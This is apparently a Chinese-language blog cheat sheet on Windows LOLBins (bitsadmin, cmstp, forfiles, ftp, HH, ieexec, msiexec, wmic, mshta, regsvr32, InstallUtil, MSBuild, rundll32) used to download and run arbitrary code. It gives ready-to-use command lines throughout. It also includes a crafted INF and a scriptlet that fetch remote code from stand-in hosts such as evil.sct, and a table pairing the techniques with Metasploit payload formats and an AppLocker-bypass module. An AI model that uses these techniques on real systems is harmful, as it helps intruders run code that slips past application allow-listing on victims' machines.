bitsadmin
文件流
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /complete 1
下载
bitsadmin /create 1 & bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\autoruns.exe & bitsadmin /RESUME 1 & bitsadmin /complete 1
复制
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
执行
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
拆解
- bitsadmin /create 1 创建一个名为1的任务
- bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\cmd.exe,前者源地址,后者落地地址
-
bitsadmin /SetNotifyCmdLine 1 c:\data\cmd.exe NULL执行exe的关键 - bitsadmin /RESUME 1
- bitsadmin /Complete 1
- bitsadmin /Reset
Deletes all jobs in the manager
cmstp.exe
需要构造inf文件,重点在于[UnRegisterOCXSection]节点
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://evil.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
需要远程sct文件
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
cmstp.exe /ni /s c:\evil.inf 虽然本地或远程inf文件均可,但实际测试时用本地inf才能触发计算器,相隔20秒。
注意: 因为[strings]节点的问题,执行后桌面上会多出一个网路连接的图标。
Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
FTP
重点在于ftp -s
echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
HH.exe
执行时出现下载提示
HH.exe c:\windows\system32\calc.exe
ieexec.exe
执行路径
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
但是执行失败
ieexec.exe https://live.sysinternals.com/autoruns.exe
msiexec
本地远程msi文件均可
msiexec /i /q payload.msi
wmic
wmic.exe process call create calc
总结
| 执行命令行 | payload生成 | payload加载 | 备注 |
|---|---|---|---|
START /B cscript.exe //Nologo %temp%\msf.vbs |
-f vbs |
无 | 基于vbscript或js,调用wscript.shell执行 |
mshta http://evil.hta |
-f hta |
无 | 同上 |
InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll |
-f csharp |
地址 | 需要先执行生成csc.exe /target:library /unsafe /out:installUtil.dll C:\payload.cs
|
MSBuild.exe c:\payload.xml |
-f csharp |
地址 | 无 |
rundll32.exe C:\calc.dll, EntryPoint |
-f dll |
无 | rundll32.exe [目标DLL],[要执行的函数名称] [函数参数] |
regsvr32 /s /n /u /i:http://evil.sct |
无 | 无 | exploit/windows/misc/regsvr32_applocker_bypass_server |
网友评论